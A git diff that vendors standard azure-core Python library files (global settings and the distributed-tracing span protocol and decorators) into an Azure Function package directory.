+# https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
+class _Unset(Enum):
+    token = 0
+_unset = _Unset.token
+
+
+def convert_bool(value):
+    # type: (Union[str, bool]) -> bool
+    """Convert a string to True or False
+
+    If a boolean is passed in, it is returned as-is. Otherwise the function
+    maps the following strings, ignoring case:
+
+    * "yes", "1", "on" -> True
+    * "no", "0", "off" -> False
+
+    :param value: the value to convert
+    :type value: string
+    :returns: bool
+    :raises ValueError: If conversion to bool fails
+
+    """
+    if value in (True, False):
+        return cast(bool, value)
+    val = cast(str, value).lower()
+    if val in ["yes", "1", "on", "true"]:
+        return True
+    if val in ["no", "0", "off", "false"]:
+        return False
+    raise ValueError("Cannot convert {} to boolean value".format(value))
+
+
+_levels = {
+    "CRITICAL": logging.CRITICAL,
+    "ERROR": logging.ERROR,
+    "WARNING": logging.WARNING,
+    "INFO": logging.INFO,
+    "DEBUG": logging.DEBUG,
+}
+
+
+def convert_logging(value):
+    # type: (Union[str, int]) -> int
+    """Convert a string to a Python logging level
+
+    If a log level is passed in, it is returned as-is.
Otherwise the function
+    understands the following strings, ignoring case:
+
+    * "critical"
+    * "error"
+    * "warning"
+    * "info"
+    * "debug"
+
+    :param value: the value to convert
+    :type value: string
+    :returns: int
+    :raises ValueError: If conversion to log level fails
+
+    """
+    if value in set(_levels.values()):
+        return cast(int, value)
+    val = cast(str, value).upper()
+    level = _levels.get(val)
+    if not level:
+        raise ValueError("Cannot convert {} to log level, valid values are: {}".format(value, ", ".join(_levels)))
+    return level
+
+
+def get_opencensus_span():
+    # type: () -> Optional[Type[AbstractSpan]]
+    """Returns the OpenCensusSpan if opencensus is installed else returns None"""
+    try:
+        from azure.core.tracing.ext.opencensus_span import OpenCensusSpan  # pylint:disable=redefined-outer-name
+
+        return OpenCensusSpan
+    except ImportError:
+        return None
+
+
+def get_opencensus_span_if_opencensus_is_imported():
+    # type: () -> Optional[Type[AbstractSpan]]
+    if "opencensus" not in sys.modules:
+        return None
+    return get_opencensus_span()
+
+
+_tracing_implementation_dict = {
+    "opencensus": get_opencensus_span
+}  # type: Dict[str, Callable[[], Optional[Type[AbstractSpan]]]]
+
+
+def convert_tracing_impl(value):
+    # type: (Union[str, Type[AbstractSpan]]) -> Optional[Type[AbstractSpan]]
+    """Convert a string to AbstractSpan
+
+    If an AbstractSpan is passed in, it is returned as-is. Otherwise the function
+    understands the following strings, ignoring case:
+
+    * "opencensus"
+
+    :param value: the value to convert
+    :type value: string
+    :returns: AbstractSpan
+    :raises ValueError: If conversion to AbstractSpan fails
+
+    """
+    if value is None:
+        return get_opencensus_span_if_opencensus_is_imported()
+
+    if not isinstance(value, six.string_types):
+        value = cast(Type[AbstractSpan], value)
+        return value
+
+    value = cast(str, value)  # mypy clarity
+    value = value.lower()
+    get_wrapper_class = _tracing_implementation_dict.get(value, lambda: _unset)
+    wrapper_class = get_wrapper_class()  # type: Union[None, _Unset, Type[AbstractSpan]]
+    if wrapper_class is _unset:
+        raise ValueError(
+            "Cannot convert {} to AbstractSpan, valid values are: {}".format(
+                value, ", ".join(_tracing_implementation_dict)
+            )
+        )
+    return wrapper_class
+
+
+class PrioritizedSetting(object):
+    """Return a value for a global setting according to configuration precedence.
+
+    The following methods are searched in order for the setting:
+
+    4. immediate values
+    3. previously user-set value
+    2. environment variable
+    1. system setting
+    0. implicit default
+
+    If a value cannot be determined, a RuntimeError is raised.
+
+    The ``env_var`` argument specifies the name of an environment variable to check for
+    setting values, e.g. ``"AZURE_LOG_LEVEL"``.
+
+    The optional ``system_hook`` can be used to specify a function that will
+    attempt to look up a value for the setting from system-wide configurations.
+
+    The optional ``default`` argument specifies an implicit default value for
+    the setting that is returned if no other methods provide a value.
+
+    A ``convert`` argument may be provided to convert values before they are
+    returned. For instance, to convert log levels in environment variables
+    to ``logging`` module values.
+
+    """
+
+    def __init__(self, name, env_var=None, system_hook=None, default=_Unset, convert=None):
+
+        self._name = name
+        self._env_var = env_var
+        self._system_hook = system_hook
+        self._default = default
+        self._convert = convert if convert else lambda x: x
+        self._user_value = _Unset
+
+    def __repr__(self):
+        # type: () -> str
+        return "PrioritizedSetting(%r)" % self._name
+
+    def __call__(self, value=None):
+        # type: (Any) -> Any
+        """Return the setting value according to the standard precedence.
+
+        :param value: an immediate value to use for this call only
+        :type value: str or int or float or None (default: None)
+        :returns: the value of the setting
+        :rtype: str or int or float
+        :raises: RuntimeError
+
+        """
+
+        # 4. immediate values
+        if value is not None:
+            return self._convert(value)
+
+        # 3. previously user-set value
+        if self._user_value is not _Unset:
+            return self._convert(self._user_value)
+
+        # 2. environment variable
+        if self._env_var and self._env_var in os.environ:
+            return self._convert(os.environ[self._env_var])
+
+        # 1. system setting
+        if self._system_hook:
+            return self._convert(self._system_hook())
+
+        # 0. implicit default
+        if self._default is not _Unset:
+            return self._convert(self._default)
+
+        raise RuntimeError("No configured value found for setting %r" % self._name)
+
+    def __get__(self, instance, owner):
+        return self
+
+    def __set__(self, instance, value):
+        self.set_value(value)
+
+    def set_value(self, value):
+        # type: (Any) -> None
+        """Specify a value for this setting programmatically.
+
+        A value set this way takes precedence over all other methods except
+        immediate values.
+
+        :param value: a user-set value for this setting
+        :type value: str or int or float
+        :returns: None
+
+        """
+        self._user_value = value
+
+    def unset_value(self):
+        # type: () -> None
+        """Unset the previous user value such that the priority is reset."""
+        self._user_value = _Unset
+
+    @property
+    def env_var(self):
+        return self._env_var
+
+    @property
+    def default(self):
+        return self._default
+
+
+class Settings(object):
+    """Settings for globally used Azure configuration values.
+
+    You probably don't want to create an instance of this class, but call the singleton instance:
+
+    .. code-block:: python
+
+        from azure.core.settings import settings
+        settings.log_level = logging.DEBUG
+
+    The following methods are searched in order for a setting:
+
+    4. immediate values
+    3. previously user-set value
+    2. environment variable
+    1. system setting
+    0. implicit default
+
+    An implicit default is (optionally) defined by the setting attribute itself.
+
+    A system setting value can be obtained from registries or other OS configuration
+    for settings that support that method.
+
+    An environment variable value is obtained from ``os.environ``
+
+    User-set values may be specified by assigning to the attribute:
+
+    .. code-block:: python
+
+        settings.log_level = logging.DEBUG
+
+    Immediate values are (optionally) provided when the setting is retrieved:
+
+    .. code-block:: python
+
+        settings.log_level(logging.DEBUG)
+
+    Immediate values are most often useful to provide from optional arguments
+    to client functions. If the argument value is not None, it will be returned
+    as-is. Otherwise, the setting searches other methods according to the
+    precedence rules.
+
+    Immutable configuration snapshots can be created with the following methods:
+
+    * settings.defaults returns the base default values, ignoring any environment or system
+      or user settings
+
+    * settings.current returns the current computation of settings including prioritization
+      of configuration sources, unless defaults_only is set to True (in which case the result
+      is identical to settings.defaults)
+
+    * settings.config can be called with specific values to override what settings.current
+      would provide
+
+    .. code-block:: python
+
+        # return current settings with log level overridden
+        settings.config(log_level=logging.DEBUG)
+
+    :cvar log_level: a log level to use across all Azure client SDKs (AZURE_LOG_LEVEL)
+    :type log_level: PrioritizedSetting
+    :cvar tracing_enabled: Whether tracing should be enabled across Azure SDKs (AZURE_TRACING_ENABLED)
+    :type tracing_enabled: PrioritizedSetting
+    :cvar tracing_implementation: The tracing implementation to use (AZURE_SDK_TRACING_IMPLEMENTATION)
+    :type tracing_implementation: PrioritizedSetting
+
+    :Example:
+
+    >>> import logging
+    >>> from azure.core.settings import settings
+    >>> settings.log_level = logging.DEBUG
+    >>> settings.log_level()
+    10
+
+    >>> settings.log_level(logging.WARN)
+    30
+
+    """
+
+    def __init__(self):
+        self._defaults_only = False
+
+    @property
+    def defaults_only(self):
+        """Whether to ignore environment and system settings and return only base default values.
+
+        :rtype: bool
+        """
+        return self._defaults_only
+
+    @defaults_only.setter
+    def defaults_only(self, value):
+        self._defaults_only = value
+
+    @property
+    def defaults(self):
+        """Return implicit default values for all settings, ignoring environment and system.
+
+        :rtype: namedtuple
+        """
+        props = {k: v.default for (k, v) in self.__class__.__dict__.items() if isinstance(v, PrioritizedSetting)}
+        return self._config(props)
+
+    @property
+    def current(self):
+        """Return the current values for all settings.
+
+        :rtype: namedtuple
+        """
+        if self.defaults_only:
+            return self.defaults
+        return self.config()
+
+    def config(self, **kwargs):
+        """Return the currently computed settings, with values overridden by parameter values.
+
+        Examples:
+
+        .. code-block:: python
+
+            # return current settings with log level overridden
+            settings.config(log_level=logging.DEBUG)
+
+        """
+        props = {k: v() for (k, v) in self.__class__.__dict__.items() if isinstance(v, PrioritizedSetting)}
+        props.update(kwargs)
+        return self._config(props)
+
+    def _config(self, props):  # pylint: disable=no-self-use
+        Config = namedtuple("Config", list(props.keys()))
+        return Config(**props)
+
+    log_level = PrioritizedSetting(
+        "log_level", env_var="AZURE_LOG_LEVEL", convert=convert_logging, default=logging.INFO
+    )
+
+    tracing_enabled = PrioritizedSetting(
+        "tracing_enabled", env_var="AZURE_TRACING_ENABLED", convert=convert_bool, default=False
+    )
+
+    tracing_implementation = PrioritizedSetting(
+        "tracing_implementation", env_var="AZURE_SDK_TRACING_IMPLEMENTATION", convert=convert_tracing_impl, default=None
+    )
+
+
+settings = Settings()
+"""The settings unique instance.
+
+:type settings: Settings
+"""
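A sketch of the precedence machinery above in action (immediate value > user-set value > environment variable > default; assumes AZURE_LOG_LEVEL is unset):

.. code-block:: python

    import logging
    from azure.core.settings import settings

    assert settings.log_level() == logging.INFO                    # implicit default
    settings.log_level = "debug"                                   # user-set; run through convert_logging
    assert settings.log_level() == logging.DEBUG
    assert settings.log_level(logging.WARNING) == logging.WARNING  # immediate value wins per-call
    snapshot = settings.config(log_level=logging.ERROR)            # overridden immutable snapshot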
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py
new file mode 100644
index 0000000..d130aae
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py
@@ -0,0 +1,9 @@
+# ------------------------------------
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+# ------------------------------------
+from azure.core.tracing._abstract_span import AbstractSpan, SpanKind, HttpSpanMixin, Link
+
+__all__ = [
+    "AbstractSpan", "SpanKind", "HttpSpanMixin", "Link"
+]
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc
new file mode 100644
index 0000000..909f639
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc
new file mode 100644
index 0000000..3412092
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc
new file mode 100644
index 0000000..727d8d9
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc
new file mode 100644
index 0000000..dbc313c
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc
new file mode 100644
index 0000000..a6e28c7
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py new file mode 100644 index 0000000..9bd2b68 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py @@ -0,0 +1,247 @@ +# ------------------------------------ +# Copyright (c) Microsoft Corporation. +# Licensed under the MIT License. +# ------------------------------------ +"""Protocol that defines what functions wrappers of tracing libraries should implement.""" +from enum import Enum + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import Any, Sequence, Dict, Optional, Union, Callable, ContextManager + + from azure.core.pipeline.transport import HttpRequest, HttpResponse, AsyncHttpResponse + HttpResponseType = Union[HttpResponse, AsyncHttpResponse] + AttributeValue = Union[ + str, + bool, + int, + float, + Sequence[str], + Sequence[bool], + Sequence[int], + Sequence[float], + ] + Attributes = Optional[Dict[str, AttributeValue]] + +try: + from typing_extensions import Protocol +except ImportError: + Protocol = object # type: ignore + + +class SpanKind(Enum): + UNSPECIFIED = 1 + SERVER = 2 + CLIENT = 3 + PRODUCER = 4 + CONSUMER = 5 + INTERNAL = 6 + + +class AbstractSpan(Protocol): + """Wraps a span from a distributed tracing implementation.""" + + def __init__(self, span=None, name=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Optional[Any], Optional[str], Any) -> None + """ + If a span is given wraps the span. Else a new span is created. + The optional arguement name is given to the new span. + """ + + def span(self, name="child_span", **kwargs): + # type: (Optional[str], Any) -> AbstractSpan + """ + Create a child span for the current span and append it to the child spans list. + The child span must be wrapped by an implementation of AbstractSpan + """ + + @property + def kind(self): + # type: () -> Optional[SpanKind] + """Get the span kind of this span. + + :rtype: SpanKind + """ + + @kind.setter + def kind(self, value): + # type: (SpanKind) -> None + """Set the span kind of this span.""" + + def __enter__(self): + """Start a span.""" + + def __exit__(self, exception_type, exception_value, traceback): + """Finish a span.""" + + def start(self): + # type: () -> None + """Set the start time for a span.""" + + def finish(self): + # type: () -> None + """Set the end time for a span.""" + + def to_header(self): + # type: () -> Dict[str, str] + """ + Returns a dictionary with the header labels and values. + """ + + def add_attribute(self, key, value): + # type: (str, Union[str, int]) -> None + """ + Add attribute (key value pair) to the current span. + + :param key: The key of the key value pair + :type key: str + :param value: The value of the key value pair + :type value: str + """ + + def set_http_attributes(self, request, response=None): + # type: (HttpRequest, Optional[HttpResponseType]) -> None + """ + Add correct attributes for a http client span. + + :param request: The request made + :type request: HttpRequest + :param response: The response received by the server. Is None if no response received. + :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + """ + + def get_trace_parent(self): + # type: () -> str + """Return traceparent string. 
+ + :return: a traceparent string + :rtype: str + """ + + @property + def span_instance(self): + # type: () -> Any + """ + Returns the span the class is wrapping. + """ + + @classmethod + def link(cls, traceparent, attributes=None): + # type: (str, Attributes) -> None + """ + Given a traceparent, extracts the context and links the context to the current tracer. + + :param traceparent: A string representing a traceparent + :type traceparent: str + """ + + @classmethod + def link_from_headers(cls, headers, attributes=None): + # type: (Dict[str, str], Attributes) -> None + """ + Given a dictionary, extracts the context and links the context to the current tracer. + + :param headers: A dictionary of the request header as key value pairs. + :type headers: dict + """ + + @classmethod + def get_current_span(cls): + # type: () -> Any + """ + Get the current span from the execution context. Return None otherwise. + """ + + @classmethod + def get_current_tracer(cls): + # type: () -> Any + """ + Get the current tracer from the execution context. Return None otherwise. + """ + + @classmethod + def set_current_span(cls, span): + # type: (Any) -> None + """ + Set the given span as the current span in the execution context. + """ + + @classmethod + def set_current_tracer(cls, tracer): + # type: (Any) -> None + """ + Set the given tracer as the current tracer in the execution context. + """ + + @classmethod + def change_context(cls, span): + # type: (AbstractSpan) -> ContextManager + """Change the context for the life of this context manager. + + :rtype: contextmanager + """ + + @classmethod + def with_current_context(cls, func): + # type: (Callable) -> Callable + """Passes the current spans to the new context the function will be run in. + + :param func: The function that will be run in the new context + :return: The target the pass in instead of the function + :rtype: callable + """ + +# https://github.com/python/mypy/issues/5837 +if TYPE_CHECKING: + _MIXIN_BASE = AbstractSpan +else: + _MIXIN_BASE = object + + +class HttpSpanMixin(_MIXIN_BASE): + """Can be used to get HTTP span attributes settings for free. + """ + _SPAN_COMPONENT = "component" + _HTTP_USER_AGENT = "http.user_agent" + _HTTP_METHOD = "http.method" + _HTTP_URL = "http.url" + _HTTP_STATUS_CODE = "http.status_code" + + def set_http_attributes(self, request, response=None): + # type: (HttpRequest, Optional[HttpResponseType]) -> None + """ + Add correct attributes for a http client span. + + :param request: The request made + :type request: HttpRequest + :param response: The response received by the server. Is None if no response received. + :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + """ + self.kind = SpanKind.CLIENT + self.add_attribute(self._SPAN_COMPONENT, "http") + self.add_attribute(self._HTTP_METHOD, request.method) + self.add_attribute(self._HTTP_URL, request.url) + user_agent = request.headers.get("User-Agent") + if user_agent: + self.add_attribute(self._HTTP_USER_AGENT, user_agent) + if response and response.status_code: + self.add_attribute(self._HTTP_STATUS_CODE, response.status_code) + else: + self.add_attribute(self._HTTP_STATUS_CODE, 504) + +class Link(object): + """ + This is a wrapper class to link the context to the current tracer. + :param headers: A dictionary of the request header as key value pairs. 
+    :type headers: dict
+    :param attributes: Any additional attributes that should be added to link
+    :type attributes: dict
+    """
+    def __init__(self, headers, attributes=None):
+        # type: (Dict[str, str], Attributes) -> None
+        self.headers = headers
+        self.attributes = attributes
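How a concrete plugin gets picked up: `settings.tracing_implementation` converts a name or class into an `AbstractSpan` implementation, and azure-core then drives it purely through the protocol above. A hedged sketch (a non-None result requires the opencensus extension to be installed):

.. code-block:: python

    from azure.core.settings import settings

    settings.tracing_implementation = "opencensus"  # or pass the wrapper class directly
    span_type = settings.tracing_implementation()   # None if the plugin is unavailable
    if span_type is not None:
        with span_type(name="my-operation") as span:
            span.add_attribute("custom.key", "custom-value")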
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py
new file mode 100644
index 0000000..3298050
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py
@@ -0,0 +1,110 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+# THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+"""Common functions shared by both the sync and the async decorators."""
+from contextlib import contextmanager
+import warnings
+
+from ._abstract_span import AbstractSpan
+from ..settings import settings
+
+
+try:
+    from typing import TYPE_CHECKING
+except ImportError:
+    TYPE_CHECKING = False
+
+if TYPE_CHECKING:
+    from typing import Any, Optional, Union, Callable, List, Type, Generator
+
+
+__all__ = [
+    'change_context',
+    'with_current_context',
+]
+
+
+def get_function_and_class_name(func, *args):
+    # type: (Callable, List[Any]) -> str
+    """
+    Given a function and its unnamed arguments, returns class_name.function_name. It assumes the first argument
+    is `self`. If there are no arguments then it only returns the function name.
+
+    :param func: the function passed in
+    :type func: callable
+    :param args: List of arguments passed into the function
+    """
+    try:
+        return func.__qualname__
+    except AttributeError:
+        if args:
+            return "{}.{}".format(args[0].__class__.__name__, func.__name__)  # pylint: disable=protected-access
+        return func.__name__
+
+@contextmanager
+def change_context(span):
+    # type: (Optional[AbstractSpan]) -> Generator
+    """Execute this block inside the given context and restore it afterwards.
+
+    This does not start or end the span; it just makes sure all code is executed within
+    that span.
+
+    If span is None, no-op.
+
+    :param span: A span
+    :type span: AbstractSpan
+    :rtype: contextmanager
+    """
+    span_impl_type = settings.tracing_implementation()  # type: Type[AbstractSpan]
+    if span_impl_type is None or span is None:
+        yield
+    else:
+        try:
+            with span_impl_type.change_context(span):
+                yield
+        except AttributeError:
+            # This plugin does not support "change_context"
+            warnings.warn('Your tracing plugin should be updated to support "change_context"', DeprecationWarning)
+            original_span = span_impl_type.get_current_span()
+            try:
+                span_impl_type.set_current_span(span)
+                yield
+            finally:
+                span_impl_type.set_current_span(original_span)
+
+
+def with_current_context(func):
+    # type: (Callable) -> Any
+    """Passes the current spans to the new context the function will be run in.
+
+    :param func: The function that will be run in the new context
+    :return: The func wrapped with correct context
+    :rtype: callable
+    """
+    span_impl_type = settings.tracing_implementation()  # type: Type[AbstractSpan]
+    if span_impl_type is None:
+        return func
+
+    return span_impl_type.with_current_context(func)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py
new file mode 100644
index 0000000..32dea50
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py
@@ -0,0 +1,93 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+# THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+"""The decorator to apply if you want the given function traced."""
+
+import functools
+
+from typing import Callable, Any, TypeVar, overload
+from typing_extensions import ParamSpec
+from .common import change_context, get_function_and_class_name
+from . import SpanKind as _SpanKind
+from ..settings import settings
+
+
+P = ParamSpec("P")
+T = TypeVar("T")
+
+
+@overload
+def distributed_trace(__func: Callable[P, T]) -> Callable[P, T]:
+    pass
+
+
+@overload
+def distributed_trace(  # pylint:disable=function-redefined
+    **kwargs: Any,  # pylint:disable=unused-argument
+) -> Callable[[Callable[P, T]], Callable[P, T]]:
+    pass
+
+
+def distributed_trace(  # pylint:disable=function-redefined
+    __func: Callable[P, T] = None, **kwargs: Any
+):
+    """Decorator to apply to function to get traced automatically.
+
+    Span will use the func name or "name_of_span".
+
+    :param callable func: A function to decorate
+    :keyword name_of_span: The span name to replace func name if necessary
+    :paramtype name_of_span: str
+    :keyword kind: The kind of the span. INTERNAL by default.
+    :paramtype kind: ~azure.core.tracing.SpanKind
+    """
+    name_of_span = kwargs.pop("name_of_span", None)
+    tracing_attributes = kwargs.pop("tracing_attributes", {})
+    kind = kwargs.pop("kind", _SpanKind.INTERNAL)
+
+    def decorator(func: Callable[P, T]) -> Callable[P, T]:
+        @functools.wraps(func)
+        def wrapper_use_tracer(*args: Any, **kwargs: Any) -> T:
+            merge_span = kwargs.pop("merge_span", False)
+            passed_in_parent = kwargs.pop("parent_span", None)
+
+            span_impl_type = settings.tracing_implementation()
+            if span_impl_type is None:
+                return func(*args, **kwargs)
+
+            # Merge into the current span if the parameter is set, but only if no explicit parent is passed
+            if merge_span and not passed_in_parent:
+                return func(*args, **kwargs)
+
+            with change_context(passed_in_parent):
+                name = name_of_span or get_function_and_class_name(func, *args)
+                with span_impl_type(name=name, kind=kind) as span:
+                    for key, value in tracing_attributes.items():
+                        span.add_attribute(key, value)
+                    return func(*args, **kwargs)
+
+        return wrapper_use_tracer
+
+    return decorator if __func is None else decorator(__func)
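Typical use of the decorator above on a client method; with no tracing implementation configured it is effectively a no-op. A sketch with a hypothetical class:

.. code-block:: python

    from azure.core.tracing import SpanKind
    from azure.core.tracing.decorator import distributed_trace

    class CatalogClient:
        @distributed_trace
        def get_item(self, item_id):
            ...  # traced with span name "CatalogClient.get_item"

        @distributed_trace(name_of_span="Catalog.list", kind=SpanKind.CLIENT)
        def list_items(self):
            ...  # traced with the explicit span name and kind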
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py
new file mode 100644
index 0000000..c25b1c8
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py
@@ -0,0 +1,94 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+# THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+"""The decorator to apply if you want the given function traced."""
+
+import functools
+
+from typing import Awaitable, Callable, Any, TypeVar, overload
+from typing_extensions import ParamSpec
+from .common import change_context, get_function_and_class_name
+from . import SpanKind as _SpanKind
+from ..settings import settings
+
+P = ParamSpec("P")
+T = TypeVar("T")
+
+
+@overload
+def distributed_trace_async(
+    __func: Callable[P, Awaitable[T]]
+) -> Callable[P, Awaitable[T]]:
+    pass
+
+
+@overload
+def distributed_trace_async(  # pylint:disable=function-redefined
+    **kwargs: Any,  # pylint:disable=unused-argument
+) -> Callable[[Callable[P, Awaitable[T]]], Callable[P, Awaitable[T]]]:
+    pass
+
+
+def distributed_trace_async(  # pylint:disable=function-redefined
+    __func: Callable[P, Awaitable[T]] = None, **kwargs: Any
+):
+    """Decorator to apply to function to get traced automatically.
+
+    Span will use the func name or "name_of_span".
+
+    :param callable func: A function to decorate
+    :keyword name_of_span: The span name to replace func name if necessary
+    :paramtype name_of_span: str
+    :keyword kind: The kind of the span. INTERNAL by default.
+    :paramtype kind: ~azure.core.tracing.SpanKind
+    """
+    name_of_span = kwargs.pop("name_of_span", None)
+    tracing_attributes = kwargs.pop("tracing_attributes", {})
+    kind = kwargs.pop("kind", _SpanKind.INTERNAL)
+
+    def decorator(func: Callable[P, Awaitable[T]]) -> Callable[P, Awaitable[T]]:
+        @functools.wraps(func)
+        async def wrapper_use_tracer(*args: Any, **kwargs: Any) -> T:
+            merge_span = kwargs.pop("merge_span", False)
+            passed_in_parent = kwargs.pop("parent_span", None)
+
+            span_impl_type = settings.tracing_implementation()
+            if span_impl_type is None:
+                return await func(*args, **kwargs)
+
+            # Merge into the current span if the parameter is set, but only if no explicit parent is passed
+            if merge_span and not passed_in_parent:
+                return await func(*args, **kwargs)
+
+            with change_context(passed_in_parent):
+                name = name_of_span or get_function_and_class_name(func, *args)
+                with span_impl_type(name=name, kind=kind) as span:
+                    for key, value in tracing_attributes.items():
+                        span.add_attribute(key, value)
+                    return await func(*args, **kwargs)
+
+        return wrapper_use_tracer
+
+    return decorator if __func is None else decorator(__func)
